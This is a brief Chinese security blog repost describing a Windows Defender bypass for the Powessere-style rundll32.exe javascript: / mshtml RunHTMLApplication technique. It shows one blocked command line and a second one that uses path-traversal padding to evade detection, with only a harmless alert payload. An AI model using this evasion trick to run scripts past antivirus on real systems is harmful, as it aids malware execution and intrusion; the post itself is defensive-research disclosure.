Windows Defender Trojan.Win32/Powessere.G / Mitigation Bypass

2024年2月18日08:44:42评论7 views字数 259阅读0分51秒阅读模式

C:sec>rundll32.exe javascript:"....mshtml,,RunHTMLApplication ";alert(13)

Access is denied.

C:sec>rundll32.exe javascript:"\..\..\mshtml\..\..\mshtml,RunHTMLApplication ";alert('新年快乐！')

原文始发于微信公众号（Khan安全攻防实验室）：Windows Defender Trojan.Win32/Powessere.G / Mitigation Bypass

ebpf在Android安全上的应用：结合binder完成一个行为检测沙箱(下篇)